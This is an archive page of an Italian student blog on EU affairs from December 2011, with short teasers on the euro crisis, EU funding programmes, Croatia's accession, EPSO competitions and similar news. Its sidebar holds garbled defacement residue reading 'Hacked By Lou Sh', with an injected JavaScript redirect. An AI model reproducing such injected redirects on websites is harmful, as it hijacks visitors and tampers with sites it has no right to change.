EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Dicembre 2011
it

Lunedì 28 novembre il presidente americano Barack Obama ha incontrato a Washington i responsabili dell’Ue, Herman Van Rompuy e Jose Manuel Barroso, per disegnare una strategia tempestiva per salvare la moneta unica europea. Le cose stanno così: se l’euro cede il passo, anche gli Stati Uniti ne pagheranno le conseguenze. Del resto, l’economie americana ed europea sono pericolosamente intrecciate, soprattutto sul versante dei mercati, e un crollo di una banca europea avrebbe certamente conseguenze devastanti sull'economia mondiale.

“Siamo pronti a fare la nostra parte per aiutare l’Unione europea. Risolvere la crisi attuale è estremamente importante per la nostra economia. Se l’Europa ha una contrazione della crescita, se l’Europa è in difficoltà, sarà molto più difficile creare posti di lavoro qui”. Con queste parole, a margine (...)

it

È stato varato a Bruxelles dalla Commissione europea, Connecting Europe Facility (meccanismo per collegare l’Europa), un piano di investimenti di 50 miliardi di euro che si pone come obiettivo quello di migliorare le reti europee nei settori dei trasporti, dell’energia e delle risorse digitali.

Contribuire a creare nuovi posti di lavoro, rendere “più verde” l’economia europea - introducendo modi di trasporto meno inquinanti, collegamenti a banda larga ad alta velocità e sfruttando al massimo le potenzialità offerte dalle energie rinnovabile, riducendo così la dipendenze energetica dell’UE - (...)

it

I giudici nazionali non hanno il potere di far applicare filtri per il contrasto della pirateria in virtù di quanto prescritto dalla direttiva comunitaria sul commercio elettronico e dalla Carta dei diritti fondamentali dell’UE.

La sentenza, emessa lo scorso 24 novembre dalla terza sezione della Corte di giustizia dell’Unione europea, recita testualmente: “il diritto dell’Unione vieta un’ingiunzione di un giudice nazionale diretta ad imporre ad un fornitore di accesso ad Internet di predisporre un sistema di filtraggio per (...)

it

Dalla seconda metà di dicembre avranno inizio i programmi didattici del corso di preparazione avanzata per l’accesso alla carriera diplomatica. Organizzato dall’università Luiss Guido Carli in associazione con il Circolo dei diplomatici, il corso si prefigge l’obiettivo di aiutare i giovani diplomatici nel superamento del concorso bandito dal Ministero degli Affari Esteri.

Una carriera europea, un sogno diventato necessità. Quanto agguerrita sia diventata la concorrenza per accaparrarsi un posto entro i confini comunitari lo sanno bene soprattutto tutti coloro che arrancano lungo il difficile sentiero della diplomazia. I modi per iniziare a muovere i primi passi (...)

it

Grazie all’iniziativa lanciata dalla Commissione europea, e alla tempestiva adesione di ben 28 aziende, è nata la coalizione “Better Internet for kids”: da oggi sarà così possibile fare del Web un luogo più sicuro per tutti quei bambini che navigano in rete.

Che lo si usi una o più ore al giorno, da casa o dall’ufficio, per motivi di lavoro o per puro divertimento, Internet è ormai entrato a far parte della nostra vita quotidiana. Navigando in rete, infatti, è possibile accedere, con pochi e semplici click, a una quantità di informazioni potenzialmente (...)

it

Il 30 novembre scorso il commissario europeo per la Ricerca, l'innovazione e la scienza, Máire Geoghegan-Quinn, ha presentato un programma che prevede misure dal valore complessivo di 80 miliardi di euro, volte a stimolare la ricerca, l'innovazione e la competitività in Europa. All’interno del pacchetto, il programma “Cosme” dedicherà alle piccole e medie imprese un budget da 2,5 miliardi.

La crisi finanziaria ha colpito tutti i settori, ma a pagarne le spese più ingenti è la piccola industria. Perché? In una congiuntura economica in cui le banche si fidano sempre meno dei propri clienti, il rischio concreto è il credit crunch, termine che ultimamente va per la maggiore, e forse (...)

it

In occasione dell'anno europeo del Volontariato, fioriscono le iniziative volte al potenziamento della rete di giovani volontari europei attivi nel mondo. Si collocano all'interno di questo scenario anche i due progetti promossi dall’associazione ARCS, ONG dell'organizzazione ARCI (Associazione Ricreativa e Culturale Italiana).

L’ARCS, Associazione Ricreativa per la Cultura Solidale, nasce nel 1985 per volontà dell’organizzazione non governativa ARCI di vita, all’interno della sua struttura, ad un nuovo settore, volto all’ampliamento della partecipazione civile nel campo della cooperazione solidale internazionale. Sono (...)

it

Da Zagabria il premier Kosor sottolinea che le riforme intraprese in Croazia sono irreversibili. Superati i principali ostacoli all’ingresso croato: la cooperazione con il Tribunale internazionale sui crimini di guerra in ex-Iugoslavia e la modernizzazione del settore amministrativo e giudiziario.

Dopo otto lunghi anni di trattative, la Croazia è entrata ufficialmente a far parte dell’Ue. Con la firma del trattato di adesione l’ex repubblica iugoslava diventerà il ventottesimo Stato membro dell’Unione a partire dal 1° luglio 2013, mettendo fine ad un processo iniziato nel 2003 con la (...)

it

Si tratta di The importance of speking two laguages, sintetica ed incisiva pellicola degli studenti del Centro Sperimentale di Cinematografia di Roma (CSC), che ha colpito positivamente la giuria e, nonostante l’elevata caratura degli altri lavori, è stata premiata col primo posto.

Anche quest’anno il Prix Europa 2011 si è svolto durante la terza settimana di ottobre in Germania e le premiazioni sono avvenute nella capitale tedesca come ormai accade dal 1997, data in cui il “vecchio” Prix Europa (attivo già dal 1987) si è fuso col Prix Futura di Berlino. Giunto alla sua 25esima (...)

it

Lo afferma l’Osservatorio europeo delle droghe e delle tossicodipendenze (Oedt), in occasione della presentazione della Relazione annuale 2011 a Lisbona.

Per avere una visione più ampia e completa sul fenomeno della droga, l’Unione europea ha raccolto dati provenienti dagli stati membri, proprio per fotografare l’attuale situazione al fine di promuovere nuove politiche volte ad ostacolare il commercio di sostanze stupefacenti. Le informazioni (...)

it

L’Ufficio Europeo Di Selezione del Personale (EPSO) è l’organo che si occupa, insieme ad una commissione preposta ad esaminare i vari candidati detta commissione giudicatrice, di indire e gestire concorsi per la selezione di personale adatto a ricoprire incarichi all’interno delle varie istituzioni dell’Unione Europea e ha sede a Bruxelles.

Uno degli ultimi concorsi proposti è quello per l’assunzione da Assistenti nel settore del Segretariato (AST1) il cui termine ultimo per candidarsi è fissato per il 20 Dicembre 2011. I posti messi a disposizione sono 257. I candidati ritenuti adatti saranno chiamati a ricoprire posti vacanti (...)

it

La Commissione europea ha presentato a Bruxelles la proposta per il nuovo programma Life che prevede di destinare ben 3,2 miliardi di euro alla salvaguardia dell’ambiente e del clima. L’iniziativa, da attuare nel periodo 2014-2020, fa leva sulla positiva esperienza del programma Life+ e, con l’obiettivo di attuare una sostanziale riforma dello stesso, mira a renderlo più semplice, incisivo e flessibile, fornendogli una dotazione di bilancio maggiore di quella passata.

Avviato per la prima volta nel lontano 1992 il programma Life è considerato uno tra i più importanti finanziamenti dell’Unione Europea a favore dell’ambiente. Tramite esso - e grazie all’iniziale stanziamento di più di 2,5 miliardi di euro - sono stati infatti finanziati più di 3.500 progetti diversi (...)

it

“Irlanda e Spagna avevano finanze pubbliche abbastanza buone, ma grossi squilibri macroeconomici. Dispiace che la Gran Bretagna non abbia voluto aderire. Dispiace per il bene dell’Europa e per il bene dei cittadini della Gran Bretagna”. Così il commissario agli affari economici Oli Rehn a margine dei provvedimenti della Six Pack definita da lui stesso “Un’intesa che cambierà radicalmente il paesaggio fiscale ed economico dell’Europa”.

Alla fine tra mille polemiche, favorite dall’esclusione volontaria dell’Inghilterra, i provvedimenti del cosiddetto “Six Pack” sono entrati in vigore il 13 dicembre scorso tra la soddisfazione di Oli Rehn e di tutte le componenti dell’Unione Europea. Composta di 5 regolamenti e una direttiva la (...)

it

Quale miglior regalo per i genitori se non la sicurezza e la felicità dei propri figli? In questo verso tende l’iniziativa della CE che regola la vendita dei giocattoli tanto desiderati dai più piccoli in questo periodo.

È stato il vicepresidente della Commissione europea, Antonio Tajani, a lanciare la Campagna europea sulla sicurezza dei giocattoli. E guardando il calendario ci rendiamo conto che la scelta non è poi così casuale. Lo scopo della campagna è educare i genitori all’acquisto di giocattoli sicuri per i (...)

it

In due giorni, 17 e 18 dicembre, il mondo ha perso due discusse icone della politica contemporanea. Kim Jong- il, il caro leader della Corea del Nord, ultimo dittatore comunista e Vàclav Havel, rivoluzionario anticomunista ceco, simbolo della resistenza non violenta contro l’oppressione del regime. I giustizialisti parlerebbero di compensazione storica, una casualità del destino che eclissa un fluido e coerente scorrere degli eventi. Nella realtà dei fatti, la morte di questi due protagonisti offre l’opportunità di un’analisi sulle molteplici interpretazioni che si stagliano dietro una delle più dibattute correnti politiche, il comunismo.

Dal teatro al Castello di Praga passando per il carcere sovietico. Il 18 dicembre all’età di settantacinque anni, Vàclav Havel a causa di problemi respiratori muore nella solitudine delle sua casa di campagna a Hradecek, in Boemia. Nato in una ricca famiglia di Praga, è stato Presidente prima della (...)

it

Con l’approvazione del Parlamento europeo, lo scorso 15 dicembre, si è concluso l’iter legislativo per l’adozione del permesso unico. Tutti i lavoratori extracomunitari, che risiedono e lavorano legalmente in uno degli Stati membri dell’UE, potranno finalmente godere di diritti simili a quelli degli europei riguardo a: condizioni di lavoro, pensione, sicurezza sociale e accesso ai servizi pubblici.

Migliorare le condizioni di vita e di lavoro di tutti i cittadini extracomunitari che risiedono in Europa è da sempre uno degli obiettivi che sta più a cuore all’intera Unione europea. Ed è in questo clima che si inserisce la recente direttiva sul permesso unico, approvata dalla Commissione Libertà (...)

it

Il Parlamento europeo ha chiesto al presidente siriano Bashar al Assad di abbandonare immediatamente il potere e di mettere fine alle brutali repressioni contro i manifestanti. Proposto dagli eurodeputati anche un inasprimento delle già severe sanzioni contro Damasco, mirando al regime senza colpire la popolazione.

L’uccisione di Gheddafi e la fine del regime libico non ha di certo placato i venti della Primavera araba. Il processo di democratizzazione continua passando per la fase più cruenta in Siria. Damasco e dintorni da quasi un anno sono lo scenario di scontri gli oppositori del regime di Bashar al (...)

it

Günther Oettinger, commissario UE all'energia, ha presentato il 15 dicembre scorso un progetto a lungo termine che dovrebbe far diminuire l'emissione dei gas serra tra gli 80 e i 95 punti percentuali entro il 2050.

L’Energy Roadmap 2050 segue quello che viene definito "l’accordo 20-20-20", la strategia che prevede una riduzione del consumo energetico del 20%, almeno un 20% di energia garantito dalle fonti rinnovabili ed un taglio delle emissioni di gas serra del 20%. Il sistema di produzione di energia (...)

it

L’Unione Europea da sempre si impegna per cercare di eliminare ogni forma di discriminazione e promuovere la diversità come potenziale elemento di ricchezza. Così, oltre alla messa in atto di leggi e normative idonee, l’UE ha colto l’importanza fondamentale dei mezzi di informazione per la diffusione tra l’opinione pubblica di principi antirazziali. Per questi motivi la Commissione europea ha istituito già dal 2003 il premio giornalistico “Si alle diversità. No alle discriminazioni.”

Il Premio ha come scopo quello di conferire un riconoscimento a quei giornalisti che, tramite il proprio lavoro sia sulla carta stampata sia attraverso il Web, abbiano dato un contributo alla causa dell’integrazione e abbiano messo in risalto i vantaggi della diversità e della lotta alla (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France